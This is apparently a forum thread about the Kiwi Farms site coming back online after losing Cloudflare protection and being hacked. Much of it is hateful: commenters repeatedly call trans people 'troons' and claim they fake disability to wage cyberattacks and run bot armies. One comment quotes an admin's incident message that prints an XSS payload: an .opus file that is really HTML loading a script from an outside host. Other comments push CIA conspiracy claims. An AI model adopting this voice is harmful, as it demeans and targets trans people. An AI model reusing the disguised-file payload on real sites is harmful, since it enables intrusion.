Kiwi Farms lives on the clear net again!

submitted by [deleted] from i.imgur.com

all 37 comments
sorted by:
top
newinsightfulfun

[–][deleted] 9 insightful - 3 fun9 insightful - 2 fun10 insightful - 3 fun -  (11 children)

i'm really glad about it but....so what? Troons probably will just attack farms again soon.😮‍💨

[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 2 fun -  (10 children)

It's already being DDoSed. It's slow as shit.

[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (8 children)

See? told ya 😮‍💨

[–]IndianaJones 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 3 fun -  (7 children)

I'm surprised troons are smart enough to ddos. I thought they'd be the type to trip on bananas or some shit kek, they don't seem very bright.

[–][deleted] 8 insightful - 3 fun8 insightful - 2 fun9 insightful - 3 fun -  (3 children)

Don't misunderstand troons, my dude. Many of them are highly inteligent and perfectly knows what they are doing. Also, many troons are talented programmers and have shit tons of free time.

[–]jet199 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (1 child)

I did once walk in on a debate between troons over whether using a certain programming language can turn you trans.

Apparently python is one to avoid.

[–][deleted] 5 insightful - 5 fun5 insightful - 4 fun6 insightful - 5 fun -  (0 children)

Lol xd

But yeah, it's fucking bizzare how many programmers are trooning out.🤔

[–]IndianaJones 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 1 fun -  (0 children)

oh ok sorry

[–]jet199 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (2 children)

They don't call them programmer's socks for nothing.

Most trans, even if smart, eventually start claiming disability so they can sit at home all day and wage solo cyber-warfare campaigns against normal decent people.

If not smart they will just become dull social media bots. There are a couple of troons on twitter with over 300 accounts each and that's all they do with their lives.

[–]IndianaJones 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

Sounds like a pretty sad life! They make me feel better about myself. Haha.

Damn! It's like Jurassic Park out here!

[–]fuk 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

TIL, thanks. Any sources for this claim?

[–][deleted] 3 insightful - 4 fun3 insightful - 3 fun4 insightful - 4 fun -  (4 children)

What is a clearnet and why do they farm kiwi's there?

[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 2 fun -  (3 children)

Clear net is just the regular web, not the "dark" web. Kiwi Farms is a site where people obsess over lolcows, crazy internet people.

[–][deleted] 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

👍

[–][deleted]  (1 child)

[deleted]

    [–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

    I don't condone it, but I kind of understand when people lash out against the police, abuses are all too common. Does seem weird though he had just sent an apology to the police department and supported blue lives matter.

    [–][deleted]  (6 children)

    [deleted]

      [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (5 children)

      I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

      Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.

      [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (4 children)

      Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

      Rainbow table attacks can break 1-way hashing alone, but salting should prevent this

      [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (3 children)

      Interesting. The attacker was able to gain admin access and had free roam of the system for a bit, I imagine this means the salt was comprised and then the rainbow table attack could still work, just take a bit longer.

      The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (. opus?), And xenforo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.

      [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

      Deleted everything? damn I hope they had backups. Yeah definitely curious as to what exactly happened here if you come across the info

      [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (1 child)

      It was all backed up. This is from the Telegram: (link)

      The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.

      There is a file called troonshine.opus, with the contents of this:
      <!DOCTYPE html>
      <script src=//poz.hiv/load.js></script>

      The web document, on the same domain, has a CORS rule that looks like this:
      <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />

      What could you possibly put into that document to get it to load the .opus and have the script execute?

      The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.

      The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source:
      https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
      https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
      https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

      What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened:
      x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

      So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.

      jcmoon@pm.me
      P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.

      Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.

      [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

      The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on

      Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home

      So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for secuirty. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library i'd be boned, my code depends on all those library implemenatations being correct even if I do everything right on my end

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (15 children)

      Weird that the new world order, which you believed was all-powerful and all-encompassing, seems to have...forgotten?....that just a few weeks ago they tried to censor this stalking deaththreat website.

      Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare? Or you think they just forgot about it after a week or two?

      [–][deleted] 7 insightful - 3 fun7 insightful - 2 fun8 insightful - 3 fun -  (8 children)

      Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare?

      Conspiracy? It was a campaign by Keffals. https://teddit.net/r/keffals/comments/x2bzvx/welcome_to_the_official_subreddit_of_the/

      They lobbied to get Joshua Moon kicked off Cloudflare so they could DDoS the shit out of the site, pretty sure it's happening again right now.

      have...forgotten?....that

      Forgotten? Fuck no, I don't know how many companies have dropped Kiwi Farms and Josh so far, but it's been quite the journey to getting the site back, he's probably using some foreign janky ass services, and it is recovering from a hack.

      stalking deaththreat website

      That's misinformation. It turns out it wasn't even the site that doxxed Keffals, the thinking it was because KF was shining light on him getting DIY hormones to minors.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (7 children)

      It was a campaign by Keffals

      They lobbied to get Joshua Moon kicked off

      the thinking it was because KF was shining light on him

      Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.

      If only there was a primary source we could check in with, so we didn't have to solely believe the guilty party's version of events.

      Oh wait there it. The decision maker himself already wrote why KF was removed. And it was because of the threats of violence that he observed during his personal browsing of that website.

      https://blog.cloudflare.com/kiwifarms-blocked/

      the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike we have previously seen from Kiwifarms or any other customer before

      [–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (6 children)

      Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.

      Since the Christchurch shooting censorship I have infrequently visited Kiwi Farms. I don't see these things they're accused of. The lolcows are their entertainment, they hardly want them to die, there'd be no more entertainment. And the site doesn't endorse anything illegal, users are banned permanently for that. Lots of fucked up things happen on Facebook but they don't get shut down over it, just the little guy.

      This is the story the news wouldn't tell, the other side if it: https://kiwifarms.net/threads/dropkiwifarms.128421/

      Here's a screen shot it's very detailed, and too long for the entire thing to fit, there's a lot more.

      primary source

      Like me, a sometimes Kiwi Farms user or that dude who took a quick trip over there and was scared by all the autists.

      And think about what sort of people you're defending, Keffals, a piece of shit who delights in helping minors get DIY hormones. That's highly illegal and so's the DDoSing.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (5 children)

      Bruh you had to make a screenshot too long to fit rather than face up to the obvious

      primary source

      Like me

      No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source

      [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (4 children)

      https://archive.ph/8g76E here's an archive, probably easier to read if you'd bother to look at the other side of something, only way you're ever going to be able to make an informed decision. And you might even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate and didn't just run anything in a press kit they're paid to.

      No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source

      You said he just personally browsed there. Sounded like maybe once. I was there more. The reason that was initiated was from a letter writing campaign started by Keffals. They got them booted off more than just Cloudflare, that was just the opening shot. Kiwifarms.is, kiwifarms.st, they went through a lot of different domains and providers. Kept getting dropped.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (3 children)

      even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate

      Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities

      But if it was, and the common understanding was not aligned with the wall of text nonsense you're trying to link me to, it would probably be because they're BULLSHITTERS

      You said he just personally browsed there. Sounded like maybe once. I was there more.

      Facepalm. Yeah but you're not the founder and CEO of cloudflare are you. Unlike the guy I linked you to. And you don't make decisions about what kind of content is too extreme for their platform. And that man was the CEO and was the founder and did make the decision and wrote down exactly why. And yet you find a wall of bullshit too large for a screenshot more credible 🤔...really says a lot about how you take in information for your worldview

      [–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 2 fun -  (2 children)

      Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities

      Remember I showed you how to do a search: https://duckduckgo.com/?q=kiwi+farms&t=brave&iar=news&ia=news is Time magazine and CNN "Q-adjacent conspiracy communities"?

      And yet you find a wall of bullshit too large for a screenshot more credible

      It all checks out as far as I can tell and lines up with my own experience.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (1 child)

      duckduckgo

      The youngest story on there is 8 days ago. Today's development is not a hot topic is it

      It all checks out as far as I can tell

      Oh really

      What checks did you do

      Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed. Did you try running that comparison

      [–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 2 fun -  (0 children)

      Today's development is not a hot topic is it

      The site coming back is not being covered in the news, although it's an incredibly important story in my estimation. You usually can't fight against big tech, but there's one man doing it. Fighting for his right for him and his fellow autists to be able to make fun of internet celebrities again, which is super fucking lame imo, but freedom of speech causes are often not exactly noble seeming, like Larry Flynt's efforts.

      Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed.

      No, that was nonsense. I took it right from the horses mouth, checked out the long and detailed explanation Joshua Moon wrote, along with links, and I see nothing false about it, and I also don't see any users in that thread disagreeing with the facts as outlined. You might expect users to not want to incriminate themselves, but thousands of people would hardly work seamlessly to lie.

      [–]LarrySwinger2 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (5 children)

      The CIA infiltrates groups and companies, from within which they work toward their own covert agenda, and it looks like something organic on the surface. A conspiracy is hard to prove, but I do think a large portion of woke outrage is engineered. The goals is a slow encroachment of civil liberties; they want to make it difficult to host free speech sites, without caring too much about KF in particular. If you look at the smear attack against RMS a couple years ago, you'll see something shady going on, namely that the main articles in that campaign was written by someone who worked for a company that opposes free software. So if there's covert activity going on now, it wouldn't be the first time.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (4 children)

      Ok genius so answer this. In your theory has the CIA just forgotten to remove them off the clearweb? Did they forget that they were supposed to be working on this?

      CC u/muskrat - because muskrat didn't think it was the CIA yet this dude thinks it was.

      [–][deleted] 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (0 children)

      Keffals the troon, not the CIA. Can't you read?

      [–]LarrySwinger2 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 1 fun -  (2 children)

      I'm leaving open the possibility of CIA involvement, and if it is, it's part of a slow encroachment. It could of course be authentic woke BS.

      [–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (1 child)

      Alright so you have enough of a CIA theory that they're there, they're in the mix, there's an outline of their involvement.

      But because you're basing it on zero evidence other than a conspiracist's mindset, you're unable to answer specifics, like why they seem to have forgotten about it a week later. Is that right?

      [–]LarrySwinger2 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

      I've addressed your question twice now. Lrn2read.